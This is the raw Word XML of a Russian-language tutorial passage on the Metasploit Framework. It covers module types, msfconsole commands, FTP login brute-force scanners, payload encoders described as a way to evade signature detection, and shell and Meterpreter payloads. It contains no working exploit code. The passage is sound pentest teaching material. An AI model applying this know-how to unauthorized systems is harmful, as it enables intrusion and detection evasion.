        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cxcfvbht9bqf" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Модули в MSF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим основные модули. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Все они сгруппированы по каталогам согласно назначению. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Auxiliary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">каталог для хранения вспомогательных модулей. В нем модули не используются для реализации эксплоитов — они применяются для сканирования жертвы, атак DoS, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">получения прав</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> администратора</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> методом фаззинга. Можно просканировать сеть на наличие в ней анонимного доступа к ресурсам по протоколу </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (модуль </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/ftp/anonymous</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) или перебрать при помощи фаззинга параметры подключения к ftp-серверу (модуль </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/ftp/ftp_login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) по словарю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1837690"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47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8376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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— каталог для хранения эксплоитов. В MSF они оформлены в виде модулей, что позволяет создать единую среду для пентестов. Все эксплоиты группируются по типу ОС и далее по ПО:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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484605" cy="1559842"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49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4605" cy="15598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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— содержит модули для пэйлоадов, которые запускаются удаленно на стороне жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoders</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержит модули для кодирования </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это нужно для «обфускации» кода при генерации </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Теоретически, это затрудняет его обнаружение сигнатурными методами. Список энкодеров для x86-архитектуры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049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024700" cy="1205615"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48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4700" cy="12056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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nops </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(от англ. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Operation </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— «пустая инструкция») — увеличивают размер файла. Помогают «замусорить» код или придать ему нужный размер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— модули для постэксплуатационных атак системы (после получения доступа к ней).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Важно поддерживать базу модулей в актуальном состоянии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xpix8g3p9ikt" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Работа с MSF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_if1l63upfoch" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Обзор команд Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Все основные команды Metasploit начинаются с «msf»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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040170" cy="1648512"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52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170" cy="16485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17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msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — запуск оболочки MSF. В основном вся работа происходит в ней;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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msfd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — запуск демона, который позволит использовать </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> удаленно, в рамках tcp-соединения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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msfdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — управление БД для Metasploit. Используя базу данных, можно быстрее запускать MSF и удобнее хранить собранную информацию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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msfrpc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — позволит подключаться к MSF с помощью RPC. Потребуется, чтобы использовать в </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BeeF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Browser exploitation framuseework) эксплоиты Metasploit;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — генератор </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, который позволяет создавать и модифицировать его;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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msfupdate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — утилита для обновления MSF. В Kali Linux рекомендуется перед обновлением MSF обновить ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы запустить MSF в Kali Linux, достаточно выполнить команду </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole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58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055261" cy="1153691"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50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5261" cy="11536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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Справку по всем командам можно просмотреть при помощи команды </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help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5A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895190" cy="1476050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51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5190" cy="1476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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрим наиболее полезные команды.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Back </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— перемещение назад в меню msf;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Exit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— выйти из MSF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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218344" cy="599561"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53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8344" cy="5995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15"/>
        </w:numPr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Show </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— отобразить список всех модулей или конкретных — например, эксплоитов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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978764" cy="949477"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54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8764" cy="9494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11"/>
        </w:numPr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Info </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— отобразить информацию о конкретном модуле. Помогает просматривать список опций модуля:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062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770021" cy="2266706"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55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0021" cy="22667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12"/>
        </w:numPr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Search </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— поиск информации: можно найти эксплоит по конкретному </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cve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64">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1174115"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56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1741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13"/>
        </w:numPr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Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— использовать модуль, указывая его имя. Как только он подключится, можно просмотреть специфичные для него опции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066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810539" cy="1686184"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57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0539" cy="16861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both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Опции, как правило, требуют указывать конкретные данные — например, адреса удаленного хоста. Число опций отличается для различных модулей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068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104732" cy="1878266"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58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4732" cy="18782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26"/>
        </w:numPr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Jobs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— просмотреть текущие задачи. При пентесте каждой атаке с использованием MSF присваивается задача. Подобными задачами можно управлять — например, отключать неиспользуемые.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A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174599" cy="1190590"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59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4599" cy="11905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2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3zrtcfksanpc" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Основные понятия msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Эксплоит </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— в </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> это модуль для эксплуатации уязвимости. У каждого эксплоита есть ряд параметров, которые нужно настроить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— «полезная» нагрузка для эксплоита, представляет собой модуль. Виды payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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Шелл </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(от англ. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оболочка) — запускает у жертвы командную оболочку для действий, выгодных злоумышленнику. При этом организуется канал связи между ним и жертвой— за счет запуска шелла на жертве и подключения к нему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload в MSF по техникам:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наиболее богатый по функционалу payload, который можно задействовать в системе жертвы. Запускается в оперативной памяти благодаря технике </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dll injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не оставляет следов в системе жертвы. Имеет множество встроенных команд;</w:t>
      </w:r>
    </w:p>
